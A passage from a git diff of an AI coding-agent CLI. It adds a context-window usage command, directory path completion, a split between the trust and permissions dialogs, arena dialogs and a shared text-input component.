+ +/** + * Parse concatenated memory content into individual file entries. 
+ * Memory content format: "--- Context from: ---\n\n--- End of Context from: ---" + */ +function parseMemoryFiles(memoryContent: string): ContextMemoryDetail[] { + if (!memoryContent || memoryContent.trim().length === 0) return []; + + const results: ContextMemoryDetail[] = []; + // Use backreference (\1) to ensure start/end path markers match + const regex = + /--- Context from: (.+?) ---\n([\s\S]*?)--- End of Context from: \1 ---/g; + let match: RegExpExecArray | null; + + while ((match = regex.exec(memoryContent)) !== null) { + const filePath = match[1]!; + const content = match[2]!; + results.push({ + path: filePath, + tokens: estimateTokens(content), + }); + } + + // If no structured markers found, treat as a single memory block + if (results.length === 0 && memoryContent.trim().length > 0) { + results.push({ + path: t('memory'), + tokens: estimateTokens(memoryContent), + }); + } + + return results; +} + +export const contextCommand: SlashCommand = { + name: 'context', + get description() { + return t( + 'Show context window usage breakdown. Use "/context detail" for per-item breakdown.', + ); + }, + kind: CommandKind.BUILT_IN, + action: async (context: CommandContext, args?: string) => { + const showDetails = + args?.trim().toLowerCase() === 'detail' || + args?.trim().toLowerCase() === '-d'; + const { config } = context.services; + if (!config) { + context.ui.addItem( + { + type: MessageType.ERROR, + text: t('Config not loaded.'), + }, + Date.now(), + ); + return; + } + + // --- Gather data --- + + const modelName = config.getModel() || 'unknown'; + const contentGeneratorConfig = config.getContentGeneratorConfig(); + const contextWindowSize = + contentGeneratorConfig.contextWindowSize ?? DEFAULT_TOKEN_LIMIT; + + // Total prompt token count from API (most accurate) + const apiTotalTokens = uiTelemetryService.getLastPromptTokenCount(); + // Cached content token count — when available (e.g. 
DashScope prefix caching), + // represents the cached overhead (system prompt + tools). Using this gives a much + // more accurate "Messages" count: promptTokens - cachedTokens = actual history tokens. + const apiCachedTokens = uiTelemetryService.getLastCachedContentTokenCount(); + + // 1. System prompt tokens (without memory, as memory is counted separately) + const systemPromptText = getCoreSystemPrompt(undefined, modelName); + const systemPromptTokens = estimateTokens(systemPromptText); + + // 2. Tool declarations tokens (includes ALL tools: built-in, MCP, skill tool) + const toolRegistry = config.getToolRegistry(); + const allTools = toolRegistry ? toolRegistry.getAllTools() : []; + const toolDeclarations = toolRegistry + ? toolRegistry.getFunctionDeclarations() + : []; + const toolsJsonStr = JSON.stringify(toolDeclarations); + const allToolsTokens = estimateTokens(toolsJsonStr); + + // 3. Per-tool details (for breakdown display) + const builtinTools: ContextToolDetail[] = []; + const mcpTools: ContextToolDetail[] = []; + for (const tool of allTools) { + const toolJsonStr = JSON.stringify(tool.schema); + const tokens = estimateTokens(toolJsonStr); + if (tool instanceof DiscoveredMCPTool) { + mcpTools.push({ + name: `${tool.serverName}__${tool.serverToolName || tool.name}`, + tokens, + }); + } else if (tool.name !== ToolNames.SKILL) { + // Built-in tool (exclude SkillTool, which is shown under Skills) + builtinTools.push({ + name: tool.name, + tokens, + }); + } + } + + // 4. Memory files + const memoryContent = config.getUserMemory(); + const memoryFiles = parseMemoryFiles(memoryContent); + const memoryFilesTokens = memoryFiles.reduce((sum, f) => sum + f.tokens, 0); + + // 5. Skills (progressive disclosure) + // Two cost components: + // a) Tool definition: SkillTool's description embeds all skill + // name+description listings plus instruction text — always in context. 
+ // b) Loaded bodies: When the model invokes a skill, the full SKILL.md + // body is injected into the conversation as a tool result. We track + // which skills have been loaded and attribute their body tokens here + // so the "Skills" category accurately reflects the total cost. + const skillTool = allTools.find((tool) => tool.name === ToolNames.SKILL); + const skillToolDefinitionTokens = skillTool + ? estimateTokens(JSON.stringify(skillTool.schema)) + : 0; + + // Determine which skills have been loaded in this session + const loadedSkillNames: ReadonlySet = + skillTool instanceof SkillTool + ? skillTool.getLoadedSkillNames() + : new Set(); + + // Per-skill breakdown: listing cost + body cost for loaded skills + const skillManager = config.getSkillManager(); + const skillConfigs = skillManager ? await skillManager.listSkills() : []; + let loadedBodiesTokens = 0; + const skills: ContextSkillDetail[] = skillConfigs.map((skill) => { + const listingTokens = estimateTokens( + `\n\n${skill.name}\n\n\n${skill.description} (${skill.level})\n\n\n${skill.level}\n\n`, + ); + const isLoaded = loadedSkillNames.has(skill.name); + let bodyTokens: number | undefined; + if (isLoaded && skill.body) { + const baseDir = skill.filePath + ? skill.filePath.replace(/\/[^/]+$/, '') + : ''; + bodyTokens = estimateTokens(buildSkillLlmContent(baseDir, skill.body)); + loadedBodiesTokens += bodyTokens; + } + return { + name: skill.name, + tokens: listingTokens, + loaded: isLoaded, + bodyTokens, + }; + }); + + // Total skills cost = tool definition + loaded bodies + const skillsTokens = skillToolDefinitionTokens + loadedBodiesTokens; + + // 6. Autocompact buffer + const compressionThreshold = + config.getChatCompression()?.contextPercentageThreshold ?? + DEFAULT_COMPRESSION_THRESHOLD; + const autocompactBuffer = + compressionThreshold > 0 + ? Math.round((1 - compressionThreshold) * contextWindowSize) + : 0; + + // 7. 
Calculate raw overhead + // allToolsTokens includes the skill tool definition; loadedBodiesTokens + // covers the on-demand skill bodies now attributed to Skills. + const rawOverhead = + systemPromptTokens + + allToolsTokens + + memoryFilesTokens + + loadedBodiesTokens; + + // 8. Determine total tokens and build breakdown + const isEstimated = apiTotalTokens === 0; + + // Sum of MCP tool tokens for category-level display + const mcpToolsTotalTokens = mcpTools.reduce( + (sum, tool) => sum + tool.tokens, + 0, + ); + + let totalTokens: number; + let displaySystemPrompt: number; + let displayBuiltinTools: number; + let displayMcpTools: number; + let displayMemoryFiles: number; + let displaySkills: number; + let messagesTokens: number; + let freeSpace: number; + let detailBuiltinTools: ContextToolDetail[]; + let detailMcpTools: ContextToolDetail[]; + let detailMemoryFiles: ContextMemoryDetail[]; + let detailSkills: ContextSkillDetail[]; + + if (isEstimated) { + // No API data yet: show raw overhead estimates only. + // Use 0 as totalTokens so the progress bar stays empty — + // avoids showing an inflated estimate that would "decrease" + // once real API data arrives. 
+ totalTokens = 0; + displaySystemPrompt = systemPromptTokens; + // Skills = tool definition + loaded bodies + displaySkills = skillsTokens; + // builtinTools = allTools minus skills-definition minus mcpTools + displayBuiltinTools = Math.max( + 0, + allToolsTokens - skillToolDefinitionTokens - mcpToolsTotalTokens, + ); + displayMcpTools = mcpToolsTotalTokens; + displayMemoryFiles = memoryFilesTokens; + messagesTokens = 0; + // Free space accounts for the estimated overhead + freeSpace = Math.max( + 0, + contextWindowSize - rawOverhead - autocompactBuffer, + ); + detailBuiltinTools = builtinTools; + detailMcpTools = mcpTools; + detailMemoryFiles = memoryFiles; + detailSkills = skills; + } else { + // API data available: use actual total with proportional scaling + totalTokens = apiTotalTokens; + + // When estimates overshoot API total, scale down proportionally + // so the breakdown categories add up to totalTokens. + const overheadScale = + rawOverhead > totalTokens ? totalTokens / rawOverhead : 1; + + displaySystemPrompt = Math.round(systemPromptTokens * overheadScale); + const scaledAllTools = Math.round(allToolsTokens * overheadScale); + displayMemoryFiles = Math.round(memoryFilesTokens * overheadScale); + // Skills = tool definition + loaded bodies (scaled together) + displaySkills = Math.round(skillsTokens * overheadScale); + const scaledMcpTotal = Math.round(mcpToolsTotalTokens * overheadScale); + displayMcpTools = scaledMcpTotal; + // builtinTools = allTools minus skill-definition minus mcpTools + const scaledSkillDefinition = Math.round( + skillToolDefinitionTokens * overheadScale, + ); + displayBuiltinTools = Math.max( + 0, + scaledAllTools - scaledSkillDefinition - scaledMcpTotal, + ); + + const scaledOverhead = + displaySystemPrompt + + scaledAllTools + + displayMemoryFiles + + Math.round(loadedBodiesTokens * overheadScale); + + // When the API reports cached content tokens (e.g. 
DashScope prefix caching), + // use them as the actual overhead indicator for a more accurate messages count. + // cachedTokens ≈ system prompt + tools tokens actually served from cache. + // This avoids the "messages = 0" problem caused by estimation overshoot. + if (apiCachedTokens > 0) { + messagesTokens = Math.max(0, totalTokens - apiCachedTokens); + } else { + messagesTokens = Math.max(0, totalTokens - scaledOverhead); + } + + freeSpace = Math.max( + 0, + contextWindowSize - totalTokens - autocompactBuffer, + ); + + // Scale detail items to match their parent categories + const scaleDetail = (items: T[]): T[] => + overheadScale < 1 + ? items.map((item) => ({ + ...item, + tokens: Math.round(item.tokens * overheadScale), + })) + : items; + + detailBuiltinTools = scaleDetail(builtinTools); + detailMcpTools = scaleDetail(mcpTools); + detailMemoryFiles = scaleDetail(memoryFiles); + detailSkills = + overheadScale < 1 + ? skills.map((item) => ({ + ...item, + tokens: Math.round(item.tokens * overheadScale), + bodyTokens: item.bodyTokens + ? 
Math.round(item.bodyTokens * overheadScale) + : undefined, + })) + : skills; + } + + const breakdown: ContextCategoryBreakdown = { + systemPrompt: displaySystemPrompt, + builtinTools: displayBuiltinTools, + mcpTools: displayMcpTools, + memoryFiles: displayMemoryFiles, + skills: displaySkills, + messages: messagesTokens, + freeSpace, + autocompactBuffer, + }; + + const contextUsageItem: HistoryItemContextUsage = { + type: MessageType.CONTEXT_USAGE, + modelName, + totalTokens, + contextWindowSize, + breakdown, + builtinTools: detailBuiltinTools, + mcpTools: detailMcpTools, + memoryFiles: detailMemoryFiles, + skills: detailSkills, + isEstimated, + showDetails, + }; + + context.ui.addItem(contextUsageItem, Date.now()); + }, +}; diff --git a/packages/cli/src/ui/commands/directoryCommand.tsx b/packages/cli/src/ui/commands/directoryCommand.tsx index 1fcd83dd3..ca57ad10d 100644 --- a/packages/cli/src/ui/commands/directoryCommand.tsx +++ b/packages/cli/src/ui/commands/directoryCommand.tsx @@ -7,6 +7,7 @@ import type { SlashCommand, CommandContext } from './types.js'; import { CommandKind } from './types.js'; import { MessageType } from '../types.js'; +import * as fs from 'node:fs'; import * as os from 'node:os'; import * as path from 'node:path'; import { loadServerHierarchicalMemory } from '@qwen-code/qwen-code-core'; @@ -25,6 +26,44 @@ export function expandHomeDir(p: string): string { return path.normalize(expandedPath); } +/** + * Returns directory path completions for the given partial argument. + * Supports comma-separated paths by completing only the last segment. + */ +export function getDirPathCompletions(partialArg: string): string[] { + const lastComma = partialArg.lastIndexOf(','); + const prefix = lastComma >= 0 ? partialArg.substring(0, lastComma + 1) : ''; + const partial = + lastComma >= 0 + ? 
partialArg.substring(lastComma + 1).trimStart() + : partialArg; + + const trimmed = partial.trim(); + if (!trimmed) return []; + + const expanded = trimmed.startsWith('~') + ? trimmed.replace(/^~/, os.homedir()) + : trimmed; + const endsWithSep = expanded.endsWith('/') || expanded.endsWith(path.sep); + const searchDir = endsWithSep ? expanded : path.dirname(expanded); + const namePrefix = endsWithSep ? '' : path.basename(expanded); + + try { + return fs + .readdirSync(searchDir, { withFileTypes: true }) + .filter( + (e) => + e.isDirectory() && + e.name.startsWith(namePrefix) && + !e.name.startsWith('.'), + ) + .map((e) => prefix + path.join(searchDir, e.name)) + .slice(0, 8); + } catch { + return []; + } +} + export const directoryCommand: SlashCommand = { name: 'directory', altNames: ['dir'], @@ -41,6 +80,8 @@ export const directoryCommand: SlashCommand = { ); }, kind: CommandKind.BUILT_IN, + completion: async (_context: CommandContext, partialArg: string) => + getDirPathCompletions(partialArg), action: async (context: CommandContext, args: string) => { const { ui: { addItem }, diff --git a/packages/cli/src/ui/commands/exportCommand.ts b/packages/cli/src/ui/commands/exportCommand.ts index 8edec9f4d..755a7061e 100644 --- a/packages/cli/src/ui/commands/exportCommand.ts +++ b/packages/cli/src/ui/commands/exportCommand.ts @@ -22,6 +22,7 @@ import { toJsonl, generateExportFilename, } from '../utils/export/index.js'; +import { t } from '../../i18n/index.js'; /** * Action for the 'md' subcommand - exports session to markdown. 
@@ -320,30 +321,40 @@ async function exportJsonlAction( */ export const exportCommand: SlashCommand = { name: 'export', - description: 'Export current session message history to a file', + get description() { + return t('Export current session message history to a file'); + }, kind: CommandKind.BUILT_IN, subCommands: [ { name: 'html', - description: 'Export session to HTML format', + get description() { + return t('Export session to HTML format'); + }, kind: CommandKind.BUILT_IN, action: exportHtmlAction, }, { name: 'md', - description: 'Export session to markdown format', + get description() { + return t('Export session to markdown format'); + }, kind: CommandKind.BUILT_IN, action: exportMarkdownAction, }, { name: 'json', - description: 'Export session to JSON format', + get description() { + return t('Export session to JSON format'); + }, kind: CommandKind.BUILT_IN, action: exportJsonAction, }, { name: 'jsonl', - description: 'Export session to JSONL format (one message per line)', + get description() { + return t('Export session to JSONL format (one message per line)'); + }, kind: CommandKind.BUILT_IN, action: exportJsonlAction, }, diff --git a/packages/cli/src/ui/commands/permissionsCommand.test.ts b/packages/cli/src/ui/commands/permissionsCommand.test.ts index f51e7c3df..b42e546f6 100644 --- a/packages/cli/src/ui/commands/permissionsCommand.test.ts +++ b/packages/cli/src/ui/commands/permissionsCommand.test.ts @@ -18,7 +18,7 @@ describe('permissionsCommand', () => { it('should have the correct name and description', () => { expect(permissionsCommand.name).toBe('permissions'); - expect(permissionsCommand.description).toBe('Manage folder trust settings'); + expect(permissionsCommand.description).toBe('Manage permission rules'); }); it('should be a built-in command', () => { diff --git a/packages/cli/src/ui/commands/permissionsCommand.ts b/packages/cli/src/ui/commands/permissionsCommand.ts index 2b6a7c344..034fec843 100644 --- 
a/packages/cli/src/ui/commands/permissionsCommand.ts +++ b/packages/cli/src/ui/commands/permissionsCommand.ts @@ -11,7 +11,7 @@ import { t } from '../../i18n/index.js'; export const permissionsCommand: SlashCommand = { name: 'permissions', get description() { - return t('Manage folder trust settings'); + return t('Manage permission rules'); }, kind: CommandKind.BUILT_IN, action: (): OpenDialogActionReturn => ({ diff --git a/packages/cli/src/ui/commands/restoreCommand.ts b/packages/cli/src/ui/commands/restoreCommand.ts index fce633275..72d83c5aa 100644 --- a/packages/cli/src/ui/commands/restoreCommand.ts +++ b/packages/cli/src/ui/commands/restoreCommand.ts @@ -13,6 +13,7 @@ import { CommandKind, } from './types.js'; import type { Config } from '@qwen-code/qwen-code-core'; +import { t } from '../../i18n/index.js'; async function restoreAction( context: CommandContext, @@ -144,8 +145,11 @@ export const restoreCommand = (config: Config | null): SlashCommand | null => { return { name: 'restore', - description: - 'Restore a tool call. This will reset the conversation and file history to the state it was in when the tool call was suggested', + get description() { + return t( + 'Restore a tool call. 
This will reset the conversation and file history to the state it was in when the tool call was suggested', + ); + }, kind: CommandKind.BUILT_IN, action: restoreAction, completion, diff --git a/packages/cli/src/ui/commands/trustCommand.test.ts b/packages/cli/src/ui/commands/trustCommand.test.ts new file mode 100644 index 000000000..dff3e5750 --- /dev/null +++ b/packages/cli/src/ui/commands/trustCommand.test.ts @@ -0,0 +1,35 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, beforeEach } from 'vitest'; +import { trustCommand } from './trustCommand.js'; +import { type CommandContext, CommandKind } from './types.js'; +import { createMockCommandContext } from '../../test-utils/mockCommandContext.js'; + +describe('trustCommand', () => { + let mockContext: CommandContext; + + beforeEach(() => { + mockContext = createMockCommandContext(); + }); + + it('should have the correct name and description', () => { + expect(trustCommand.name).toBe('trust'); + expect(trustCommand.description).toBe('Manage folder trust settings'); + }); + + it('should be a built-in command', () => { + expect(trustCommand.kind).toBe(CommandKind.BUILT_IN); + }); + + it('should return an action to open the trust dialog', () => { + const actionResult = trustCommand.action?.(mockContext, ''); + expect(actionResult).toEqual({ + type: 'dialog', + dialog: 'trust', + }); + }); +}); diff --git a/packages/cli/src/ui/commands/trustCommand.ts b/packages/cli/src/ui/commands/trustCommand.ts new file mode 100644 index 000000000..9fa566db2 --- /dev/null +++ b/packages/cli/src/ui/commands/trustCommand.ts @@ -0,0 +1,21 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +import type { OpenDialogActionReturn, SlashCommand } from './types.js'; +import { CommandKind } from './types.js'; +import { t } from '../../i18n/index.js'; + +export const trustCommand: SlashCommand = { + name: 'trust', + get 
description() { + return t('Manage folder trust settings'); + }, + kind: CommandKind.BUILT_IN, + action: (): OpenDialogActionReturn => ({ + type: 'dialog', + dialog: 'trust', + }), +}; diff --git a/packages/cli/src/ui/commands/types.ts b/packages/cli/src/ui/commands/types.ts index 3fe41647b..d74f3e393 100644 --- a/packages/cli/src/ui/commands/types.ts +++ b/packages/cli/src/ui/commands/types.ts @@ -148,6 +148,10 @@ export interface OpenDialogActionReturn { dialog: | 'help' + | 'arena_start' + | 'arena_select' + | 'arena_stop' + | 'arena_status' | 'auth' | 'theme' | 'editor' @@ -155,6 +159,7 @@ export interface OpenDialogActionReturn { | 'model' | 'subagent_create' | 'subagent_list' + | 'trust' | 'permissions' | 'approval-mode' | 'resume' diff --git a/packages/cli/src/ui/components/BaseTextInput.tsx b/packages/cli/src/ui/components/BaseTextInput.tsx new file mode 100644 index 000000000..07eb1a693 --- /dev/null +++ b/packages/cli/src/ui/components/BaseTextInput.tsx @@ -0,0 +1,287 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview BaseTextInput — shared text input component with rendering + * and common readline keyboard handling. + * + * Provides: + * - Viewport line rendering from a TextBuffer with cursor display + * - Placeholder support when buffer is empty + * - Configurable border/prefix styling + * - Standard readline shortcuts (Ctrl+A/E/K/U/W, Escape, etc.) + * - An `onKeypress` interceptor so consumers can layer custom behavior + * + * Used by both InputPrompt (with syntax highlighting + complex key handling) + * and AgentComposer (with minimal customization). 
+ */ + +import type React from 'react'; +import { useCallback } from 'react'; +import { Box, Text } from 'ink'; +import chalk from 'chalk'; +import type { TextBuffer } from './shared/text-buffer.js'; +import type { Key } from '../hooks/useKeypress.js'; +import { useKeypress } from '../hooks/useKeypress.js'; +import { keyMatchers, Command } from '../keyMatchers.js'; +import { cpSlice, cpLen } from '../utils/textUtils.js'; +import { theme } from '../semantic-colors.js'; + +// ─── Types ────────────────────────────────────────────────── + +export interface RenderLineOptions { + /** The text content of this visual line. */ + lineText: string; + /** Whether the cursor is on this visual line. */ + isOnCursorLine: boolean; + /** The cursor column within this visual line (visual col, not logical). */ + cursorCol: number; + /** Whether the cursor should be rendered. */ + showCursor: boolean; + /** Index of this line within the rendered viewport (0-based). */ + visualLineIndex: number; + /** Absolute visual line index (scrollVisualRow + visualLineIndex). */ + absoluteVisualIndex: number; + /** The underlying text buffer. */ + buffer: TextBuffer; + /** The first visible visual row (scroll offset). */ + scrollVisualRow: number; +} + +export interface BaseTextInputProps { + /** The text buffer driving this input. */ + buffer: TextBuffer; + /** Called when the user submits (Enter). Buffer is cleared automatically. */ + onSubmit: (text: string) => void; + /** + * Optional key interceptor. Called before default readline handling. + * Return `true` if the key was handled (skips default processing). + */ + onKeypress?: (key: Key) => boolean; + /** Whether to show the blinking block cursor. Defaults to true. */ + showCursor?: boolean; + /** Placeholder text shown when the buffer is empty. */ + placeholder?: string; + /** Custom prefix node (defaults to `> `). */ + prefix?: React.ReactNode; + /** Border color for the input box. 
*/ + borderColor?: string; + /** Whether keyboard handling is active. Defaults to true. */ + isActive?: boolean; + /** + * Custom line renderer for advanced rendering (e.g. syntax highlighting). + * When not provided, lines are rendered as plain text with cursor overlay. + */ + renderLine?: (opts: RenderLineOptions) => React.ReactNode; +} + +// ─── Default line renderer ────────────────────────────────── + +/** + * Renders a single visual line with an inverse-video block cursor. + * Uses codepoint-aware string operations for Unicode/emoji safety. + */ +export function defaultRenderLine({ + lineText, + isOnCursorLine, + cursorCol, + showCursor, +}: RenderLineOptions): React.ReactNode { + if (!isOnCursorLine || !showCursor) { + return {lineText || ' '}; + } + + const len = cpLen(lineText); + + // Cursor past end of line — append inverse space + if (cursorCol >= len) { + return ( + + {lineText} + {chalk.inverse(' ') + '\u200B'} + + ); + } + + const before = cpSlice(lineText, 0, cursorCol); + const cursorChar = cpSlice(lineText, cursorCol, cursorCol + 1); + const after = cpSlice(lineText, cursorCol + 1); + + return ( + + {before} + {chalk.inverse(cursorChar)} + {after} + + ); +} + +// ─── Component ────────────────────────────────────────────── + +export const BaseTextInput: React.FC = ({ + buffer, + onSubmit, + onKeypress, + showCursor = true, + placeholder, + prefix, + borderColor, + isActive = true, + renderLine = defaultRenderLine, +}) => { + // ── Keyboard handling ── + + const handleKey = useCallback( + (key: Key) => { + // Let the consumer intercept first + if (onKeypress?.(key)) { + return; + } + + // ── Standard readline shortcuts ── + + // Submit (Enter, no modifiers) + if (keyMatchers[Command.SUBMIT](key)) { + if (buffer.text.trim()) { + const text = buffer.text; + buffer.setText(''); + onSubmit(text); + } + return; + } + + // Newline (Shift+Enter, Ctrl+Enter, Ctrl+J) + if (keyMatchers[Command.NEWLINE](key)) { + buffer.newline(); + return; + } + + // Escape 
→ clear input + if (keyMatchers[Command.ESCAPE](key)) { + if (buffer.text.length > 0) { + buffer.setText(''); + } + return; + } + + // Ctrl+C → clear input + if (keyMatchers[Command.CLEAR_INPUT](key)) { + if (buffer.text.length > 0) { + buffer.setText(''); + } + return; + } + + // Ctrl+A → home + if (keyMatchers[Command.HOME](key)) { + buffer.move('home'); + return; + } + + // Ctrl+E → end + if (keyMatchers[Command.END](key)) { + buffer.move('end'); + return; + } + + // Ctrl+K → kill to end of line + if (keyMatchers[Command.KILL_LINE_RIGHT](key)) { + buffer.killLineRight(); + return; + } + + // Ctrl+U → kill to start of line + if (keyMatchers[Command.KILL_LINE_LEFT](key)) { + buffer.killLineLeft(); + return; + } + + // Ctrl+W / Alt+Backspace → delete word backward + if (keyMatchers[Command.DELETE_WORD_BACKWARD](key)) { + buffer.deleteWordLeft(); + return; + } + + // Ctrl+X Ctrl+E → open in external editor + if (keyMatchers[Command.OPEN_EXTERNAL_EDITOR](key)) { + buffer.openInExternalEditor(); + return; + } + + // Backspace + if ( + key.name === 'backspace' || + key.sequence === '\x7f' || + (key.ctrl && key.name === 'h') + ) { + buffer.backspace(); + return; + } + + // Fallthrough — delegate to buffer's built-in input handler + buffer.handleInput(key); + }, + [buffer, onSubmit, onKeypress], + ); + + useKeypress(handleKey, { isActive }); + + // ── Rendering ── + + const linesToRender = buffer.viewportVisualLines; + const [cursorVisualRow, cursorVisualCol] = buffer.visualCursor; + const scrollVisualRow = buffer.visualScrollRow; + + const resolvedBorderColor = borderColor ?? theme.border.focused; + const resolvedPrefix = prefix ?? ( + {'> '} + ); + + return ( + + {resolvedPrefix} + + {buffer.text.length === 0 && placeholder ? ( + showCursor ? 
( + + {chalk.inverse(placeholder.slice(0, 1))} + {placeholder.slice(1)} + + ) : ( + {placeholder} + ) + ) : ( + linesToRender.map((lineText, idx) => { + const absoluteVisualIndex = scrollVisualRow + idx; + const isOnCursorLine = absoluteVisualIndex === cursorVisualRow; + + return ( + + {renderLine({ + lineText, + isOnCursorLine, + cursorCol: cursorVisualCol, + showCursor, + visualLineIndex: idx, + absoluteVisualIndex, + buffer, + scrollVisualRow, + })} + + ); + }) + )} + + + ); +}; diff --git a/packages/cli/src/ui/components/Composer.test.tsx b/packages/cli/src/ui/components/Composer.test.tsx index 67d992dbe..5d969de5c 100644 --- a/packages/cli/src/ui/components/Composer.test.tsx +++ b/packages/cli/src/ui/components/Composer.test.tsx @@ -111,6 +111,7 @@ const createMockUIState = (overrides: Partial = {}): UIState => debugMessage: '', nightly: false, isTrustedFolder: true, + taskStartTokens: 0, ...overrides, }) as UIState; diff --git a/packages/cli/src/ui/components/Composer.tsx b/packages/cli/src/ui/components/Composer.tsx index 193549245..530b57046 100644 --- a/packages/cli/src/ui/components/Composer.tsx +++ b/packages/cli/src/ui/components/Composer.tsx @@ -27,7 +27,17 @@ export const Composer = () => { const uiActions = useUIActions(); const { vimEnabled } = useVimMode(); - const { showAutoAcceptIndicator } = uiState; + const { showAutoAcceptIndicator, sessionStats, taskStartTokens } = uiState; + + const tokens = Object.values(sessionStats.metrics?.models ?? {}).reduce( + (acc, model) => ({ + prompt: acc.prompt + (model.tokens?.prompt ?? 0), + candidates: acc.candidates + (model.tokens?.candidates ?? 
0), + }), + { prompt: 0, candidates: 0 }, + ); + + const taskTokens = tokens.candidates - taskStartTokens; // State for keyboard shortcuts display toggle const [showShortcuts, setShowShortcuts] = useState(false); @@ -64,6 +74,7 @@ export const Composer = () => { : uiState.currentLoadingPhrase } elapsedTime={uiState.elapsedTime} + candidatesTokens={taskTokens} /> )} @@ -104,8 +115,8 @@ export const Composer = () => { {/* Exclusive area: only one component visible at a time */} {/* Hide footer when a confirmation dialog (e.g. ask_user_question) is active */} - {!showSuggestions && - uiState.streamingState !== StreamingState.WaitingForConfirmation && + {uiState.isInputActive && + !showSuggestions && (showShortcuts ? ( ) : ( diff --git a/packages/cli/src/ui/components/DialogManager.tsx b/packages/cli/src/ui/components/DialogManager.tsx index 26390e270..2e5fae0c8 100644 --- a/packages/cli/src/ui/components/DialogManager.tsx +++ b/packages/cli/src/ui/components/DialogManager.tsx @@ -18,8 +18,13 @@ import { SettingsDialog } from './SettingsDialog.js'; import { QwenOAuthProgress } from './QwenOAuthProgress.js'; import { AuthDialog } from '../auth/AuthDialog.js'; import { EditorSettingsDialog } from './EditorSettingsDialog.js'; -import { PermissionsModifyTrustDialog } from './PermissionsModifyTrustDialog.js'; +import { TrustDialog } from './TrustDialog.js'; +import { PermissionsDialog } from './PermissionsDialog.js'; import { ModelDialog } from './ModelDialog.js'; +import { ArenaStartDialog } from './arena/ArenaStartDialog.js'; +import { ArenaSelectDialog } from './arena/ArenaSelectDialog.js'; +import { ArenaStopDialog } from './arena/ArenaStopDialog.js'; +import { ArenaStatusDialog } from './arena/ArenaStatusDialog.js'; import { ApprovalModeDialog } from './ApprovalModeDialog.js'; import { theme } from '../semantic-colors.js'; import { useUIState } from '../contexts/UIStateContext.js'; @@ -237,6 +242,49 @@ export const DialogManager = ({ if (uiState.isModelDialogOpen) { 
return ; } + if (uiState.activeArenaDialog === 'start') { + return ( + uiActions.closeArenaDialog()} + onConfirm={(models) => uiActions.handleArenaModelsSelected?.(models)} + /> + ); + } + if (uiState.activeArenaDialog === 'status') { + const arenaManager = config.getArenaManager(); + if (arenaManager) { + return ( + + ); + } + } + if (uiState.activeArenaDialog === 'stop') { + return ( + + ); + } + if (uiState.activeArenaDialog === 'select') { + const arenaManager = config.getArenaManager(); + if (arenaManager) { + return ( + + ); + } + } + if (uiState.isAuthDialogOpen || uiState.authError) { return ( @@ -267,15 +315,16 @@ export const DialogManager = ({ ); } } - if (uiState.isPermissionsDialogOpen) { + if (uiState.isTrustDialogOpen) { return ( - + ); } + if (uiState.isPermissionsDialogOpen) { + return ; + } + if (uiState.isSubagentCreateDialogOpen) { return ( = ({ {itemForDisplay.type === 'info' && ( )} + {itemForDisplay.type === 'success' && ( + + )} {itemForDisplay.type === 'warning' && ( )} @@ -192,6 +198,32 @@ const HistoryItemDisplayComponent: React.FC = ({ {itemForDisplay.type === 'mcp_status' && ( )} + {itemForDisplay.type === 'context_usage' && ( + + )} + {itemForDisplay.type === 'arena_agent_complete' && ( + + )} + {itemForDisplay.type === 'arena_session_complete' && ( + + )} {itemForDisplay.type === 'insight_progress' && ( )} diff --git a/packages/cli/src/ui/components/InputPrompt.test.tsx b/packages/cli/src/ui/components/InputPrompt.test.tsx index 61584b8c7..347a1e918 100644 --- a/packages/cli/src/ui/components/InputPrompt.test.tsx +++ b/packages/cli/src/ui/components/InputPrompt.test.tsx @@ -1957,6 +1957,25 @@ describe('InputPrompt', () => { }); describe('command search (Ctrl+R when not in shell)', () => { + it('passes newest-first user history to command search', async () => { + props.shellModeActive = false; + props.userMessages = ['oldest', 'middle', 'newest']; + + const { unmount } = renderWithProviders(); + await wait(); + + const 
commandSearchCall = + mockedUseReverseSearchCompletion.mock.calls.find( + ([, history]) => + Array.isArray(history) && + history.length === 3 && + history.includes('newest'), + ); + + expect(commandSearchCall?.[1]).toEqual(['newest', 'middle', 'oldest']); + unmount(); + }); + it('enters command search on Ctrl+R and shows suggestions', async () => { props.shellModeActive = false; diff --git a/packages/cli/src/ui/components/InputPrompt.tsx b/packages/cli/src/ui/components/InputPrompt.tsx index 42ec7efbb..52add983b 100644 --- a/packages/cli/src/ui/components/InputPrompt.tsx +++ b/packages/cli/src/ui/components/InputPrompt.tsx @@ -5,7 +5,7 @@ */ import type React from 'react'; -import { useCallback, useEffect, useState, useRef } from 'react'; +import { useCallback, useEffect, useMemo, useState, useRef } from 'react'; import { Box, Text } from 'ink'; import { SuggestionsDisplay, MAX_WIDTH } from './SuggestionsDisplay.js'; import { theme } from '../semantic-colors.js'; @@ -18,7 +18,6 @@ import { useShellHistory } from '../hooks/useShellHistory.js'; import { useReverseSearchCompletion } from '../hooks/useReverseSearchCompletion.js'; import { useCommandCompletion } from '../hooks/useCommandCompletion.js'; import type { Key } from '../hooks/useKeypress.js'; -import { useKeypress } from '../hooks/useKeypress.js'; import { keyMatchers, Command } from '../keyMatchers.js'; import type { CommandContext, SlashCommand } from '../commands/types.js'; import type { Config } from '@qwen-code/qwen-code-core'; @@ -43,7 +42,13 @@ import { useShellFocusState } from '../contexts/ShellFocusContext.js'; import { useUIState } from '../contexts/UIStateContext.js'; import { useUIActions } from '../contexts/UIActionsContext.js'; import { useKeypressContext } from '../contexts/KeypressContext.js'; +import { + useAgentViewState, + useAgentViewActions, +} from '../contexts/AgentViewContext.js'; import { FEEDBACK_DIALOG_KEYS } from '../FeedbackDialog.js'; +import { BaseTextInput } from 
